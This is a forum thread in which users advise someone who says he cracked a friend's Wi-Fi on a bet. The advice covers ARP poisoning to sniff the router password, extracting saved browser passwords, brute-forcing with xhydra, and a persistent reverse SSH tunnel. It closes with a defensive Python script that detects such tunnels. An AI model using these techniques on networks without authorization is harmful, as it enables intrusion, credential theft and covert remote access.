Warfusion Posted December 5, 2009
Hey all. My friend and I have a bet that I can't crack his wireless, which is done, and use it to set up an SSH server. The only problem I'm having is port forwarding on his router. Any ideas?

Sparda Posted December 5, 2009
UPnP might be enabled.

Kerberos Posted December 5, 2009
Well, it's a dirty trick and would probably be fairly obvious, but if you already have access to the wireless you can start a packet capture and then one-way ARP poison him (basically disconnecting him) and wait until he logs into the router to check out what's going on. This is, of course, assuming that he knows how to do that. But based on the fact that he dared you to get an SSH server going I'm going to assume that he does (which is why I don't bother suggesting trying default passwords). Grab the password from the packet capture and you're set.
That's the best I can come up with. Usually when I need to get into a router it's used by people who could care less about security (and so everything is default) and probably don't even know how to get to the login page. I've never tried getting into a router that's on a network with people that actually know how to log into it :P.
That's an interesting bet. My grandma bet me I couldn't get into her computer a few days ago but it just doesn't feel right hacking into an old woman's computer. Call me old fashioned but I just couldn't take her up on it :P.

Ingo Posted December 5, 2009
If your friend uses Firefox as his primary browser there is a high chance he has the router's login in saved passwords. So if you can get your hands on it you may get lucky. The only other methods I can think of are sniffing it (what Kerberos said) and brute-forcing.

Warfusion (Author) Posted December 6, 2009
@sparda no, UPnP isn't enabled haha
@kerberos I didn't think of that, good tip, I'll try that
@ingo lol he uses Opera rofl

Ingo Posted December 6, 2009
Not sure about Opera, but I guess it also has the option of saving passwords like every other browser. With Opera though I don't really know where to get the passes, but a little Googling should help you out.

Sud0x3 Posted December 6, 2009
Seems like an odd bet! On the matter of Opera passwords: they are stored in a file "wand.dat" in Opera's program files folder. If my memory serves me right there is a tool called unwand which can extract passwords from wand.dat if a master password is not used.

Warfusion (Author) Posted December 6, 2009
The bet started because I was bored and it seemed like a fun little project... plus $100 if I can get that server running before Christmas. But I'm going to try all of what you guys are telling me and let you know. :)

operat0r_001 Posted December 9, 2009
If the SSID is the same as the factory default, likely he has never even logged into it. If not default, try xhydra and friends to brute force it with a small wordlist.

taiyed14 Posted December 9, 2009
I'm assuming you already have an SSH server running on the LAN, and now you want to access it from the WAN (hence the port forwarding). Try a reverse SSH tunnel. From the LAN SSH server, initiate an SSH session to an external SSH server:

    ssh -R 9999:localhost:22 external.sshd.com

Then from the external SSH server connect back to the LAN SSH server:

    ssh -p 9999 localhost

Bingo, you now have an SSH connection into his LAN from the WAN. If you want to get real fancy, you can create a bash script to run every few min on the server to keep the outbound connection alive. Remember, keep it simple...

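For administrators of an SSH host, the reverse tunnel in the post above shows up as an sshd-owned listening socket on a port other than the daemon's own; this added example (not part of the thread) flags such listeners in `ss -tlnp` output. The sample output, the function name and the X11 port range are assumptions made for illustration.

```python
import re

# Constructed sample of `ss -tlnp` output (not captured from a real host).
# Run as root on a real system, otherwise the process column may be empty.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=801,fd=3))
LISTEN 0      128        127.0.0.1:9999       0.0.0.0:*     users:(("sshd",pid=4242,fd=9))
LISTEN 0      128        127.0.0.1:6010       0.0.0.0:*     users:(("sshd",pid=4300,fd=11))
LISTEN 0      511          0.0.0.0:80         0.0.0.0:*     users:(("nginx",pid=950,fd=6))
LISTEN 0      128             [::]:22            [::]:*     users:(("sshd",pid=801,fd=4))
LISTEN 0      128            [::1]:9999          [::]:*     users:(("sshd",pid=4242,fd=8))
"""

# Local address, local port, then the first process name and pid on the line.
LINE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def find_forward_listeners(ss_output, sshd_ports=(22,)):
    """Return (addr, port, pid, kind) for sshd listeners that are not sshd's own port."""
    findings = []
    for line in ss_output.splitlines():
        m = LINE.match(line.strip())
        if not m or m["proc"] != "sshd":
            continue  # header line, or a listener owned by another program
        port = int(m["port"])
        if port in sshd_ports:
            continue  # the daemon's normal listening socket
        # Heuristic (assumption): sshd X11 forwarding binds 6000 + display,
        # with displays starting at 10 by default; anything else is treated
        # as a remote (-R) forward.
        kind = "x11-forward" if 6010 <= port <= 6099 else "remote-forward"
        findings.append((m["addr"], port, int(m["pid"]), kind))
    return findings


if __name__ == "__main__":
    for addr, port, pid, kind in find_forward_listeners(SAMPLE_SS):
        print(f"{kind}: {addr}:{port} held by sshd pid {pid}")
```

Setting `AllowTcpForwarding` to `no` or `local` in `sshd_config` on that host stops it from accepting `-R` forwards at all.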